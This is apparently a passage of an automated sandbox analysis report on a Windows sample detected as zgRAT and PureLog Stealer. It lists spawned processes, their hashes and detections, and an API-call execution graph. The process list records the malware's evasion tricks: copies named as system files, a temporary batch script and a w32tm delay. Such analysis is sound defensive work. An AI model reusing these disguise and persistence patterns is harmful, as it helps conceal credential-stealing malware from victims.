                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                                                                          Imagebase:0x30000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:63
                                                                                          Start time:05:07:09
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                                                                          Imagebase:0xe30000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:64
                                                                                          Start time:05:07:09
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat"
                                                                                          Imagebase:0x7ff7be540000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:65
                                                                                          Start time:05:07:09
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:66
                                                                                          Start time:05:07:11
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:chcp 65001
                                                                                          Imagebase:0x7ff64b1d0000
                                                                                          File size:14'848 bytes
                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:70
                                                                                          Start time:05:07:14
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Recovery\Memory Compression.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Recovery\Memory Compression.exe"
                                                                                          Imagebase:0x680000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Memory Compression.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:71
                                                                                          Start time:05:07:14
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Recovery\Memory Compression.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Recovery\Memory Compression.exe"
                                                                                          Imagebase:0xfd0000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:72
                                                                                          Start time:05:07:14
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                          Imagebase:0x7ff61fce0000
                                                                                          File size:108'032 bytes
                                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:73
                                                                                          Start time:05:07:15
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\serverDll.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\ChainbrowserNet\serverDll.exe
                                                                                          Imagebase:0xd00000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:74
                                                                                          Start time:05:07:15
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\serverDll.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\ChainbrowserNet\serverDll.exe
                                                                                          Imagebase:0x550000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:75
                                                                                          Start time:05:07:15
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Users\Default\Videos\System.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\Default User\Videos\System.exe"
                                                                                          Imagebase:0xf80000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Videos\System.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:76
                                                                                          Start time:05:07:16
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Users\Default\Videos\System.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\Default User\Videos\System.exe"
                                                                                          Imagebase:0x630000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:81
                                                                                          Start time:05:07:23
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\ChainbrowserNet\backgroundTaskHost.exe"
                                                                                          Imagebase:0x1f0000
                                                                                          File size:3'701'760 bytes
                                                                                          MD5 hash:9F9F04273C02095B1603F3B01EB15D53
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainbrowserNet\backgroundTaskHost.exe, Author: Joe Security
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 65%, ReversingLabs
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:82
                                                                                          Start time:05:07:28
                                                                                          Start date:04/01/2025
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:9.6%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:9.2%
                                                                                            Total number of Nodes:1514
                                                                                            Total number of Limit Nodes:28
                                                                                            execution_graph 25382 a4eda7 48 API calls _unexpected 25423 a4f3a0 27 API calls 25348 a5a4a0 71 API calls _free 25349 a4dca1 DialogBoxParamW 25350 a608a0 IsProcessorFeaturePresent 25424 a36faa 111 API calls 3 library calls 25384 a4b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23406 a4e5b1 23407 a4e578 23406->23407 23409 a4e85d 23407->23409 23435 a4e5bb 23409->23435 23411 a4e86d 23412 a4e8ee 23411->23412 23413 a4e8ca 23411->23413 23416 a4e966 LoadLibraryExA 23412->23416 23417 a4e9c7 23412->23417 23423 a4ea95 23412->23423 23427 a4e9d9 23412->23427 23414 a4e7fb DloadReleaseSectionWriteAccess 6 API calls 23413->23414 23415 a4e8d5 RaiseException 23414->23415 23430 a4eac3 23415->23430 23416->23417 23418 a4e979 GetLastError 23416->23418 23421 a4e9d2 FreeLibrary 23417->23421 23417->23427 23419 a4e9a2 23418->23419 23428 a4e98c 23418->23428 23422 a4e7fb DloadReleaseSectionWriteAccess 6 API calls 23419->23422 23420 a4ea37 GetProcAddress 23420->23423 23424 a4ea47 GetLastError 23420->23424 23421->23427 23429 a4e9ad RaiseException 23422->23429 23444 a4e7fb 23423->23444 23425 a4ea5a 23424->23425 23425->23423 23431 a4e7fb DloadReleaseSectionWriteAccess 6 API calls 23425->23431 23427->23420 23427->23423 23428->23417 23428->23419 23429->23430 23430->23407 23432 a4ea7b RaiseException 23431->23432 23433 a4e5bb ___delayLoadHelper2@8 6 API calls 23432->23433 23434 a4ea92 23433->23434 23434->23423 23436 a4e5c7 23435->23436 23437 a4e5ed 23435->23437 23452 a4e664 23436->23452 23437->23411 23439 a4e5cc 23440 a4e5e8 23439->23440 23455 a4e78d 23439->23455 23460 a4e5ee GetModuleHandleW GetProcAddress GetProcAddress 23440->23460 23443 a4e836 23443->23411 23445 a4e80d 23444->23445 23446 a4e82f 23444->23446 23447 a4e664 DloadReleaseSectionWriteAccess 3 API calls 23445->23447 23446->23430 23448 a4e812 23447->23448 23449 a4e82a 23448->23449 23450 a4e78d DloadProtectSection 3 API calls 23448->23450 23463 a4e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23449->23463 23450->23449 23461 a4e5ee GetModuleHandleW GetProcAddress GetProcAddress 23452->23461 23454 a4e669 23454->23439 23456 a4e7a2 DloadProtectSection 23455->23456 23457 a4e7a8 23456->23457 23458 a4e7dd VirtualProtect 23456->23458 23462 a4e6a3 VirtualQuery GetSystemInfo 23456->23462 23457->23440 23458->23457 23460->23443 23461->23454 23462->23458 23463->23446 23672 a4f3b2 23673 a4f3be __FrameHandler3::FrameUnwindToState 23672->23673 23704 a4eed7 23673->23704 23675 a4f3c5 23676 a4f518 23675->23676 23679 a4f3ef 23675->23679 23777 a4f838 4 API calls 2 library calls 23676->23777 23678 a4f51f 23770 a57f58 23678->23770 23691 a4f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23679->23691 23715 a58aed 23679->23715 23686 a4f40e 23689 a4f495 23724 a58a3e 51 API calls 23689->23724 23694 a4f48f 23691->23694 23773 a57af4 38 API calls 3 library calls 23691->23773 23693 a4f49d 23725 a4df1e 23693->23725 23723 a4f953 GetStartupInfoW __cftof 23694->23723 23698 a4f4b1 23698->23678 23699 a4f4b5 23698->23699 23700 a4f4be 23699->23700 23775 a57efb 28 API calls _abort 23699->23775 23776 a4f048 12 API calls ___scrt_uninitialize_crt 23700->23776 23703 a4f4c6 23703->23686 23705 a4eee0 23704->23705 23779 a4f654 IsProcessorFeaturePresent 23705->23779 23707 a4eeec 23780 a52a5e 23707->23780 23709 a4eef5 23709->23675 23710 a4eef1 23710->23709 23788 a58977 23710->23788 23713 a4ef0c 23713->23675 23717 a58b04 23715->23717 23716 a4fbbc CatchGuardHandler 5 API calls 23718 a4f408 23716->23718 23717->23716 23718->23686 23719 a58a91 23718->23719 23720 a58ac0 23719->23720 23721 a4fbbc CatchGuardHandler 5 API calls 23720->23721 23722 a58ae9 23721->23722 23722->23691 23723->23689 23724->23693 23888 a40863 23725->23888 23729 a4df3d 23937 a4ac16 23729->23937 23731 a4df46 __cftof 23732 a4df59 GetCommandLineW 23731->23732 23733 a4dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23732->23733 23734 a4df68 23732->23734 23952 a34092 23733->23952 23941 a4c5c4 23734->23941 23740 a4df76 OpenFileMappingW 23742 a4dfd6 CloseHandle 23740->23742 23743 a4df8f MapViewOfFile 23740->23743 23741 a4dfe0 23946 a4dbde 23741->23946 23742->23733 23746 a4dfa0 __InternalCxxFrameHandler 23743->23746 23747 a4dfcd UnmapViewOfFile 23743->23747 23752 a4dbde 2 API calls 23746->23752 23747->23742 23754 a4dfbc 23752->23754 23753 a490b7 8 API calls 23755 a4e0aa DialogBoxParamW 23753->23755 23754->23747 23756 a4e0e4 23755->23756 23757 a4e0f6 Sleep 23756->23757 23758 a4e0fd 23756->23758 23757->23758 23759 a4e10b 23758->23759 23985 a4ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23758->23985 23761 a4e12a DeleteObject 23759->23761 23762 a4e146 23761->23762 23763 a4e13f DeleteObject 23761->23763 23764 a4e177 23762->23764 23765 a4e189 23762->23765 23763->23762 23986 a4dc3b 6 API calls 23764->23986 23982 a4ac7c 23765->23982 23768 a4e17d CloseHandle 23768->23765 23769 a4e1c3 23774 a4f993 GetModuleHandleW 23769->23774 24237 a57cd5 23770->24237 23773->23694 23774->23698 23775->23700 23776->23703 23777->23678 23779->23707 23792 a53b07 23780->23792 23784 a52a6f 23785 a52a7a 23784->23785 23806 a53b43 DeleteCriticalSection 23784->23806 23785->23710 23787 a52a67 23787->23710 23835 a5c05a 23788->23835 23791 a52a7d 7 API calls 2 library calls 23791->23709 23793 a53b10 23792->23793 23795 a53b39 23793->23795 23796 a52a63 23793->23796 23807 a53d46 23793->23807 23812 a53b43 DeleteCriticalSection 23795->23812 23796->23787 23798 a52b8c 23796->23798 23828 a53c57 23798->23828 23802 a52baf 23803 a52bbc 23802->23803 23834 a52bbf 6 API calls ___vcrt_FlsFree 23802->23834 23803->23784 23805 a52ba1 23805->23784 23806->23787 23813 a53c0d 23807->23813 23810 a53d7e InitializeCriticalSectionAndSpinCount 23811 a53d69 23810->23811 23811->23793 23812->23796 23814 a53c26 23813->23814 23815 a53c4f 23813->23815 23814->23815 23820 a53b72 23814->23820 23815->23810 23815->23811 23818 a53c3b GetProcAddress 23818->23815 23819 a53c49 23818->23819 23819->23815 23826 a53b7e ___vcrt_InitializeCriticalSectionEx 23820->23826 23821 a53bf3 23821->23815 23821->23818 23822 a53b95 LoadLibraryExW 23823 a53bb3 GetLastError 23822->23823 23824 a53bfa 23822->23824 23823->23826 23824->23821 23825 a53c02 FreeLibrary 23824->23825 23825->23821 23826->23821 23826->23822 23827 a53bd5 LoadLibraryExW 23826->23827 23827->23824 23827->23826 23829 a53c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23828->23829 23830 a53c71 23829->23830 23831 a53c8a TlsAlloc 23830->23831 23832 a52b96 23830->23832 23832->23805 23833 a53d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23832->23833 23833->23802 23834->23805 23836 a5c077 23835->23836 23837 a5c073 23835->23837 23836->23837 23841 a5a6a0 23836->23841 23838 a4fbbc CatchGuardHandler 5 API calls 23837->23838 23839 a4eefe 23838->23839 23839->23713 23839->23791 23842 a5a6ac __FrameHandler3::FrameUnwindToState 23841->23842 23853 a5ac31 EnterCriticalSection 23842->23853 23844 a5a6b3 23854 a5c528 23844->23854 23846 a5a6c2 23847 a5a6d1 23846->23847 23867 a5a529 29 API calls 23846->23867 23869 a5a6ed LeaveCriticalSection _abort 23847->23869 23850 a5a6cc 23868 a5a5df GetStdHandle GetFileType 23850->23868 23851 a5a6e2 _abort 23851->23836 23853->23844 23855 a5c534 __FrameHandler3::FrameUnwindToState 23854->23855 23856 a5c541 23855->23856 23857 a5c558 23855->23857 23878 a591a8 20 API calls __dosmaperr 23856->23878 23870 a5ac31 EnterCriticalSection 23857->23870 23860 a5c546 23879 a59087 26 API calls __cftof 23860->23879 23861 a5c564 23866 a5c590 23861->23866 23871 a5c479 23861->23871 23864 a5c550 _abort 23864->23846 23880 a5c5b7 LeaveCriticalSection _abort 23866->23880 23867->23850 23868->23847 23869->23851 23870->23861 23872 a5b136 __dosmaperr 20 API calls 23871->23872 23874 a5c48b 23872->23874 23873 a5c498 23875 a58dcc _free 20 API calls 23873->23875 23874->23873 23881 a5af0a 23874->23881 23877 a5c4ea 23875->23877 23877->23861 23878->23860 23879->23864 23880->23864 23882 a5ac98 __dosmaperr 5 API calls 23881->23882 23883 a5af31 23882->23883 23884 a5af4f InitializeCriticalSectionAndSpinCount 23883->23884 23887 a5af3a 23883->23887 23884->23887 23885 a4fbbc CatchGuardHandler 5 API calls 23886 a5af66 23885->23886 23886->23874 23887->23885 23987 a4ec50 23888->23987 23891 a408e7 23893 a40c14 GetModuleFileNameW 23891->23893 23998 a575fb 42 API calls 2 library calls 23891->23998 23892 a40888 GetProcAddress 23894 a408a1 23892->23894 23895 a408b9 GetProcAddress 23892->23895 23904 a40c32 23893->23904 23894->23895 23897 a408cb 23895->23897 23897->23891 23898 a40b54 23898->23893 23899 a40b5f GetModuleFileNameW CreateFileW 23898->23899 23900 a40b8f SetFilePointer 23899->23900 23901 a40c08 CloseHandle 23899->23901 23900->23901 23902 a40b9d ReadFile 23900->23902 23901->23893 23902->23901 23905 a40bbb 23902->23905 23907 a40c94 GetFileAttributesW 23904->23907 23908 a40cac 23904->23908 23910 a40c5d CompareStringW 23904->23910 23989 a3b146 23904->23989 23992 a4081b 23904->23992 23905->23901 23909 a4081b 2 API calls 23905->23909 23907->23904 23907->23908 23911 a40cb7 23908->23911 23914 a40cec 23908->23914 23909->23905 23910->23904 23913 a40cd0 GetFileAttributesW 23911->23913 23916 a40ce8 23911->23916 23912 a40dfb 23936 a4a64d GetCurrentDirectoryW 23912->23936 23913->23911 23913->23916 23914->23912 23915 a3b146 GetVersionExW 23914->23915 23917 a40d06 23915->23917 23916->23914 23918 a40d73 23917->23918 23919 a40d0d 23917->23919 23920 a34092 _swprintf 51 API calls 23918->23920 23921 a4081b 2 API calls 23919->23921 23922 a40d9b AllocConsole 23920->23922 23923 a40d17 23921->23923 23924 a40df3 ExitProcess 23922->23924 23925 a40da8 GetCurrentProcessId AttachConsole 23922->23925 23926 a4081b 2 API calls 23923->23926 24003 a53e13 23925->24003 23928 a40d21 23926->23928 23999 a3e617 23928->23999 23929 a40dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23929->23924 23932 a34092 _swprintf 51 API calls 23933 a40d4f 23932->23933 23934 a3e617 53 API calls 23933->23934 23935 a40d5e 23934->23935 23935->23924 23936->23729 23938 a4081b 2 API calls 23937->23938 23939 a4ac2a OleInitialize 23938->23939 23940 a4ac4d GdiplusStartup SHGetMalloc 23939->23940 23940->23731 23945 a4c5ce 23941->23945 23942 a4c6e4 23942->23740 23942->23741 23943 a41fac CharUpperW 23943->23945 23945->23942 23945->23943 24028 a3f3fa 82 API calls 2 library calls 23945->24028 23947 a4ec50 23946->23947 23948 a4dbeb SetEnvironmentVariableW 23947->23948 23950 a4dc0e 23948->23950 23949 a4dc36 23949->23733 23950->23949 23951 a4dc2a SetEnvironmentVariableW 23950->23951 23951->23949 24029 a34065 23952->24029 23955 a4b6dd LoadBitmapW 23956 a4b6fe 23955->23956 23957 a4b70b GetObjectW 23955->23957 24063 a4a6c2 FindResourceW 23956->24063 23959 a4b71a 23957->23959 24058 a4a5c6 23959->24058 23962 a4b770 23974 a3da42 23962->23974 23964 a4b74c 24079 a4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23964->24079 23965 a4a6c2 13 API calls 23967 a4b73d 23965->23967 23967->23964 23969 a4b743 DeleteObject 23967->23969 23968 a4b754 24080 a4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23968->24080 23969->23964 23971 a4b75d 24081 a4a80c 8 API calls 23971->24081 23973 a4b764 DeleteObject 23973->23962 24092 a3da67 23974->24092 23979 a490b7 24225 a4eb38 23979->24225 23983 a4acab GdiplusShutdown CoUninitialize 23982->23983 23983->23769 23985->23759 23986->23768 23988 a4086d GetModuleHandleW 23987->23988 23988->23891 23988->23892 23990 a3b196 23989->23990 23991 a3b15a GetVersionExW 23989->23991 23990->23904 23991->23990 23993 a4ec50 23992->23993 23994 a40828 GetSystemDirectoryW 23993->23994 23995 a40840 23994->23995 23996 a4085e 23994->23996 23997 a40851 LoadLibraryW 23995->23997 23996->23904 23997->23996 23998->23898 24000 a3e627 23999->24000 24005 a3e648 24000->24005 24004 a53e1b 24003->24004 24004->23929 24004->24004 24011 a3d9b0 24005->24011 24008 a3e645 24008->23932 24009 a3e66b LoadStringW 24009->24008 24010 a3e682 LoadStringW 24009->24010 24010->24008 24016 a3d8ec 24011->24016 24013 a3d9cd 24014 a3d9e2 24013->24014 24024 a3d9f0 26 API calls 24013->24024 24014->24008 24014->24009 24017 a3d904 24016->24017 24023 a3d984 _strncpy 24016->24023 24019 a3d928 24017->24019 24025 a41da7 WideCharToMultiByte 24017->24025 24022 a3d959 24019->24022 24026 a3e5b1 50 API calls __vsnprintf 24019->24026 24027 a56159 26 API calls 3 library calls 24022->24027 24023->24013 24024->24014 24025->24019 24026->24022 24027->24023 24028->23945 24030 a3407c __vswprintf_c_l 24029->24030 24033 a55fd4 24030->24033 24036 a54097 24033->24036 24037 a540d7 24036->24037 24038 a540bf 24036->24038 24037->24038 24040 a540df 24037->24040 24053 a591a8 20 API calls __dosmaperr 24038->24053 24042 a54636 __cftof 38 API calls 24040->24042 24041 a540c4 24054 a59087 26 API calls __cftof 24041->24054 24044 a540ef 24042->24044 24055 a54601 20 API calls 2 library calls 24044->24055 24046 a4fbbc CatchGuardHandler 5 API calls 24048 a34086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24046->24048 24047 a54167 24056 a549e6 51 API calls 3 library calls 24047->24056 24048->23955 24051 a540cf 24051->24046 24052 a54172 24057 a546b9 20 API calls _free 24052->24057 24053->24041 24054->24051 24055->24047 24056->24052 24057->24051 24082 a4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24058->24082 24060 a4a5cd 24061 a4a5d9 24060->24061 24083 a4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24060->24083 24061->23962 24061->23964 24061->23965 24064 a4a6e5 SizeofResource 24063->24064 24065 a4a7d3 24063->24065 24064->24065 24066 a4a6fc LoadResource 24064->24066 24065->23957 24065->23959 24066->24065 24067 a4a711 LockResource 24066->24067 24067->24065 24068 a4a722 GlobalAlloc 24067->24068 24068->24065 24069 a4a73d GlobalLock 24068->24069 24070 a4a7cc GlobalFree 24069->24070 24071 a4a74c __InternalCxxFrameHandler 24069->24071 24070->24065 24072 a4a754 CreateStreamOnHGlobal 24071->24072 24073 a4a7c5 GlobalUnlock 24072->24073 24074 a4a76c 24072->24074 24073->24070 24084 a4a626 GdipAlloc 24074->24084 24077 a4a7b0 24077->24073 24078 a4a79a GdipCreateHBITMAPFromBitmap 24078->24077 24079->23968 24080->23971 24081->23973 24082->24060 24083->24061 24085 a4a645 24084->24085 24086 a4a638 24084->24086 24085->24073 24085->24077 24085->24078 24088 a4a3b9 24086->24088 24089 a4a3e1 GdipCreateBitmapFromStream 24088->24089 24090 a4a3da GdipCreateBitmapFromStreamICM 24088->24090 24091 a4a3e6 24089->24091 24090->24091 24091->24085 24093 a3da75 __EH_prolog 24092->24093 24094 a3daa4 GetModuleFileNameW 24093->24094 24095 a3dad5 24093->24095 24096 a3dabe 24094->24096 24138 a398e0 24095->24138 24096->24095 24098 a3db31 24149 a56310 24098->24149 24100 a3e261 78 API calls 24103 a3db05 24100->24103 24103->24098 24103->24100 24116 a3dd4a 24103->24116 24104 a3db44 24105 a56310 26 API calls 24104->24105 24113 a3db56 ___vcrt_InitializeCriticalSectionEx 24105->24113 24106 a3dc85 24106->24116 24185 a39d70 81 API calls 24106->24185 24110 a3dc9f ___std_exception_copy 24111 a39bd0 82 API calls 24110->24111 24110->24116 24114 a3dcc8 ___std_exception_copy 24111->24114 24113->24106 24113->24116 24163 a39e80 24113->24163 24179 a39bd0 24113->24179 24184 a39d70 81 API calls 24113->24184 24114->24116 24132 a3dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24114->24132 24186 a41b84 MultiByteToWideChar 24114->24186 24172 a3959a 24116->24172 24117 a3e159 24122 a3e1de 24117->24122 24192 a58cce 26 API calls 2 library calls 24117->24192 24119 a3e16e 24193 a57625 26 API calls 2 library calls 24119->24193 24121 a3e214 24127 a56310 26 API calls 24121->24127 24122->24121 24126 a3e261 78 API calls 24122->24126 24124 a3e1c6 24194 a3e27c 78 API calls 24124->24194 24126->24122 24128 a3e22d 24127->24128 24129 a56310 26 API calls 24128->24129 24129->24116 24132->24116 24132->24117 24133 a41da7 WideCharToMultiByte 24132->24133 24187 a3e5b1 50 API calls __vsnprintf 24132->24187 24188 a56159 26 API calls 3 library calls 24132->24188 24189 a58cce 26 API calls 2 library calls 24132->24189 24190 a57625 26 API calls 2 library calls 24132->24190 24191 a3e27c 78 API calls 24132->24191 24133->24132 24136 a3e29e GetModuleHandleW FindResourceW 24137 a3da55 24136->24137 24137->23979 24139 a398ea 24138->24139 24140 a3994b CreateFileW 24139->24140 24141 a3996c GetLastError 24140->24141 24144 a399bb 24140->24144 24195 a3bb03 24141->24195 24143 a3998c 24143->24144 24145 a39990 CreateFileW GetLastError 24143->24145 24146 a399e5 SetFileTime 24144->24146 24148 a399ff 24144->24148 24145->24144 24147 a399b5 24145->24147 24146->24148 24147->24144 24148->24103 24150 a56349 24149->24150 24151 a5634d 24150->24151 24162 a56375 24150->24162 24199 a591a8 20 API calls __dosmaperr 24151->24199 24153 a56352 24200 a59087 26 API calls __cftof 24153->24200 24154 a56699 24156 a4fbbc CatchGuardHandler 5 API calls 24154->24156 24158 a566a6 24156->24158 24157 a5635d 24159 a4fbbc CatchGuardHandler 5 API calls 24157->24159 24158->24104 24161 a56369 24159->24161 24161->24104 24162->24154 24201 a56230 5 API calls CatchGuardHandler 24162->24201 24164 a39e92 24163->24164 24168 a39ea5 24163->24168 24166 a39eb0 24164->24166 24202 a36d5b 77 API calls 24164->24202 24166->24113 24167 a39eb8 SetFilePointer 24167->24166 24169 a39ed4 GetLastError 24167->24169 24168->24166 24168->24167 24169->24166 24170 a39ede 24169->24170 24170->24166 24203 a36d5b 77 API calls 24170->24203 24173 a395be 24172->24173 24178 a395cf 24172->24178 24174 a395d1 24173->24174 24175 a395ca 24173->24175 24173->24178 24209 a39620 24174->24209 24204 a3974e 24175->24204 24178->24136 24180 a39bdc 24179->24180 24183 a39be3 24179->24183 24180->24113 24182 a39785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24182->24183 24183->24180 24183->24182 24224 a36d1a 77 API calls 24183->24224 24184->24113 24185->24110 24186->24132 24187->24132 24188->24132 24189->24132 24190->24132 24191->24132 24192->24119 24193->24124 24194->24122 24196 a3bb10 _wcslen 24195->24196 24197 a3bb39 _wcslen 24196->24197 24198 a3bbb8 GetCurrentDirectoryW 24196->24198 24197->24143 24198->24197 24199->24153 24200->24157 24201->24162 24202->24168 24203->24166 24205 a39781 24204->24205 24206 a39757 24204->24206 24205->24178 24206->24205 24215 a3a1e0 24206->24215 24210 a3964a 24209->24210 24211 a3962c 24209->24211 24212 a39669 24210->24212 24223 a36bd5 76 API calls 24210->24223 24211->24210 24213 a39638 CloseHandle 24211->24213 